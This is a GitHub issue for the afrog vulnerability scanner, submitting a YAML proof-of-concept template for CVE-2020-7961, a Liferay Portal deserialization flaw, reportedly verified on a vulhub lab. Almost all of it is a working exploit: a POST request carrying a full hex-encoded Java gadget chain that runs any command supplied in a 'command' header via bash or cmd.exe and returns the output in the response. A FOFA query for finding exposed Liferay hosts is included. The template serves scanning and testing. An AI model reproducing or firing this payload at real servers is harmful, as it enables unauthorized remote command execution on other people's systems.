### ISSUE TITLE
CVE-2020-7961

### ISSUE THREAD

**Issue by leonardo-o1** [zan8in/afrog#50]
测试靶场：vulhub/liferay-portal/CVE-2020-7961
验证：
![e7e7baa9db916bc969905aa579c93094](https://user-images.githubusercontent.com/38599982/228145699-cc9193e8-3e60-4ebf-af82-d744b1c3c8a7.png)
![image](https://user-images.githubusercontent.com/38599982/228145468-7e8a7f4b-96dd-46e5-a9f1-cff0d4a3916a.png)

```yaml
id: CVE-2020-7961

info:
  name: Liferay Portal RCE 反序列化命令执行漏洞
  author: leo
  severity: high
  verified: true
  description: |
    Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞，利用该漏洞可在目标服务器上执行任意命令。
    FOFA：app="Liferay"
  reference:
    - https://www.anquanke.com/post/id/240042

set:
  randstr: randomLowercase(15)

rules:
  r0:
    request:
      method: POST
      path: /api/jsonws/invoke
      headers:
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        command: echo {{randstr}}
      body: |
        cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=pZryCOb2&formDate=1679026956587&tableId=1&name=1&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E0020000787000000BCECAFEBABE0000003200900A0003002207008E07002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E010043636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F6163636573732F636F6E74726F6C2F416363657373436F6E74726F6C5574696C07002A010017676574416363657373436F6E74726F6C436F6E7465787401004028294C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E746578743B0C002C002D0A002B002E01003C636F6D2F6C6966657261792F706F7274616C2F6B65726E656C2F73656375726974792F617574682F416363657373436F6E74726F6C436F6E7465787407003001000B676574526573706F6E736501002A28294C6A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E73653B0C003200330A0031003401000A6765745265717565737401002928294C6A617661782F736572766C65742F687474702F48747470536572766C6574526571756573743B0C003600370A00310038010007636F6D6D616E6408003A0100256A617661782F736572766C65742F687474702F48747470536572766C65745265717565737407003C010009676574486561646572010026284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F537472696E673B0C003E003F0B003D00400100076F732E6E616D650800420100106A6176612F6C616E672F53797374656D07004401000B67657450726F70657274790C0046003F0A004500470100106A6176612F6C616E672F537472696E6707004901000B746F4C6F7765724361736501001428294C6A6176612F6C616E672F537472696E673B0C004B004C0A004A004D01000377696E08004F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C005100520A004A0053010007636D642E6578650800550100022F63080057010004626173680800590100022D6308005B0100116A6176612F6C616E672F52756E74696D6507005D01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C005F00600A005E006101000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C006300640A005E00650100116A6176612F6C616E672F50726F6365737307006701000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0C0069006A0A0068006B0100116A6176612F7574696C2F5363616E6E657207006D010018284C6A6176612F696F2F496E70757453747265616D3B29560C000A006F0A006E00700100025C6108007201000C75736544656C696D69746572010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F7574696C2F5363616E6E65723B0C007400750A006E00760100076861734E65787401000328295A0C007800790A006E007A0100046E6578740C007C004C0A006E007D01000008007F0100106C6966657261795263654465746563740800810100266A617661782F736572766C65742F687474702F48747470536572766C6574526573706F6E7365070083010009736574486561646572010027284C6A6176612F6C616E672F537472696E673B4C6A6176612F6C616E672F537472696E673B29560C008500860B008400870100135B4C6A6176612F6C616E672F537472696E673B0700890100136A6176612F696F2F496E70757453747265616D07008B01000D537461636B4D61705461626C6501001E79736F73657269616C2F50776E65723130323233313931343032353530300100204C79736F73657269616C2F50776E65723130323233313931343032353530303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F008F00000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F008F000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F008F00000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C000000D50005000A0000009AA70003014CB8002FB600354DB8002FB600394E2D123BB9004102003A041243B80048B6004E1250B600543605150599001B06BD004A5903125653590412585359051904533A06A7001806BD004A5903125A535904125C5359051904533A06B800621906B60066B6006C3A07BB006E591907B700711273B600773A081908B6007B99000B1908B6007EA7000512803A092C12821909B900880300B100000001008D00000029000503FF00450006000507008407003D07004A010000FC001407008AFD002C07008C07006E4107004A0002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78%3B%22%7D
    expression: response.raw_header.bcontains(bytes(randstr))
expression: r0()
```
